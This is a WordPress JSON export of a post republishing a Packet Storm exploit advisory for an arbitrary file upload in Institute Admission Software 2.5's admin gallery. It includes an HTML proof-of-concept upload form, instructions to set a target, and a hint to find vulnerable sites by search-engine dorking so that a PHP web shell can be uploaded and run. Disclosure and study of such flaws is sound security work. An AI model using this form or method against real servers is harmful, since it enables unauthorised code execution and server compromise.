{"id":32289,"date":"2025-12-19T11:59:12","date_gmt":"2025-12-19T11:59:12","guid":{"rendered":"http:\/\/localhost\/?p=32289"},"modified":"2025-12-19T11:59:12","modified_gmt":"2025-12-19T11:59:12","slug":"institute-admission-software-25-shell-upload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=32289","title":{"rendered":"\ud83d\udcc4 Institute Admission Software 2.5 Shell Upload_PACKETSTORM:213132"},"content":{"rendered":"

{“lastseen”:”2025-12-19T17:20:05″,”description”:”Institute Admission Software version 2.5 fails to properly validate and restrict uploaded files in the gallery upload functionality within the admin panel…”,”published”:”2025-12-19T00:00:00″,”modified”:”2025-12-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Institute Admission Software 2.5 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:213132″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Institute Admission Software 2.5 Remote File Upload Vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 137.0.1 (64 bits) |\\n | # Vendor : https:\/\/softmaart.com\/institute-admission-software.php |\\n =============================================================================================================================================\\n \\n POC :\\n \\n [+] Dorking \u0130n Google Or Other Search Enggine.\\n \\n [+] summary : This vulnerability affects Institute Admission Software v2.5, where the application fails to properly validate and restrict uploaded files in the gallery upload functionality within the admin panel.\\n An attacker can exploit this weakness by directly submitting a crafted multipart\/form-data POST request to the vulnerable endpoint, allowing the upload of arbitrary executable files instead of legitimate images.\\n Due to the absence of strict server-side file type validation, content inspection, and execution controls, \\n \\t\\t\\t a malicious file (e.g. PHP web shell or executable payload) can be successfully uploaded to the publicly accessible \/uploads\/ directory.\\n Once uploaded, the attacker may directly access the file via the browser, potentially leading to Remote Code Execution (RCE) on the target server.\\n \\n [+] Impact includes:\\n \\n Arbitrary file upload\\n \\n Remote command execution\\n \\n Full web application compromise\\n \\n Possible server takeover depending on permissions\\n \\n [+] Root Cause:\\n \\n Missing MIME-type and extension validation\\n \\n No server-side file execution restrictions\\n \\n Insecure upload directory exposure\\n \\n [+] Severity: High\\n \\n Attack Vector: Remote \/ Unauthenticated (depending on admin access exposure)\\n \\n This issue highlights a critical failure in secure file handling practices and emphasizes the necessity of enforcing strict upload validation, randomized file naming, execution blocking, and proper access controls.\\n \\n [+] The following html code uploads a executable malicious file remotely .\\n \\n [+] Save code As : poc.html\\n \\n [+] Line 01 set your Target\\n \\n [+] Link to the uploaded files :\/uoploads\/\\n \\n [+] use payload : \\n \\t\\n \\u003cform action=\\”http:\/\/127.0.0.1\/gpgcgairsain.ac.in\/admin_panel\/gallery.php?id=19\\” method=\\”POST\\” enctype=\\”multipart\/form-data\\”\\u003e\\n \\u003clabel for=\\”event\\”\\u003eEvent:\\u003c\/label\\u003e\\n \\u003cselect name=\\”event\\” id=\\”event\\”\\u003e\\n \\u003coption value=\\”19\\”\\u003eHindi Departmental Programme\\u003c\/option\\u003e\\n \\u003c!– \u064a\u0645\u0643\u0646\u0643 \u0625\u0636\u0627\u0641\u0629 \u062e\u064a\u0627\u0631\u0627\u062a \u0627\u0644\u0623\u062d\u062f\u0627\u062b \u0647\u0646\u0627 –\\u003e\\n \\u003c\/select\\u003e\\n \\u003cbr\\u003e\\u003cbr\\u003e\\n \\n \\u003clabel for=\\”photo\\”\\u003ePhoto:\\u003c\/label\\u003e\\n \\u003cinput type=\\”file\\” name=\\”photo\\” id=\\”photo\\” accept=\\”image\/*\\”\\u003e\\n \\u003cbr\\u003e\\u003cbr\\u003e\\n \\n \\u003cinput type=\\”hidden\\” name=\\”db_photo\\” value=\\”\\”\\u003e\\n \\n \\u003cinput type=\\”submit\\” name=\\”submit\\” value=\\”Upload\\”\\u003e\\n \\u003c\/form\\u003e\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213132″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213132\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-19T17:20:05″,”description”:”Institute Admission Software version 2.5 fails to properly validate and restrict uploaded files in the gallery upload functionality within the admin panel…”,”published”:”2025-12-19T00:00:00″,”modified”:”2025-12-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Institute Admission Software…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-32289","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Institute Admission Software 2.5 Shell Upload_PACKETSTORM:213132 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=32289\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Institute Admission Software 2.5 Shell Upload_PACKETSTORM:213132 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-19T17:20:05″,”description”:”Institute Admission Software version 2.5 fails to properly validate and restrict uploaded files in the gallery upload functionality within the admin panel…”,”published”:”2025-12-19T00:00:00″,”modified”:”2025-12-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Institute Admission Software...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=32289\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-19T11:59:12+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32289#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32289\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Institute Admission Software 2.5 Shell Upload_PACKETSTORM:213132\",\"datePublished\":\"2025-12-19T11:59:12+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32289\"},\"wordCount\":592,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32289#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32289\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32289\",\"name\":\"\ud83d\udcc4 Institute Admission Software 2.5 Shell Upload_PACKETSTORM:213132 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-19T11:59:12+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32289#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32289\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32289#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Institute Admission Software 2.5 Shell Upload_PACKETSTORM:213132\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Institute Admission Software 2.5 Shell Upload_PACKETSTORM:213132 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=32289","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Institute Admission Software 2.5 Shell Upload_PACKETSTORM:213132 - zero redgem","og_description":"{“lastseen”:”2025-12-19T17:20:05″,”description”:”Institute Admission Software version 2.5 fails to properly validate and restrict uploaded files in the gallery upload functionality within the admin panel…”,”published”:”2025-12-19T00:00:00″,”modified”:”2025-12-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Institute Admission Software...","og_url":"https:\/\/zero.redgem.net\/?p=32289","og_site_name":"zero redgem","article_published_time":"2025-12-19T11:59:12+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=32289#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=32289"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Institute Admission Software 2.5 Shell Upload_PACKETSTORM:213132","datePublished":"2025-12-19T11:59:12+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=32289"},"wordCount":592,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=32289#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=32289","url":"https:\/\/zero.redgem.net\/?p=32289","name":"\ud83d\udcc4 Institute Admission Software 2.5 Shell Upload_PACKETSTORM:213132 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-19T11:59:12+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=32289#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=32289"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=32289#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Institute Admission Software 2.5 Shell Upload_PACKETSTORM:213132"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32289","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=32289"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32289\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=32289"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=32289"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=32289"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}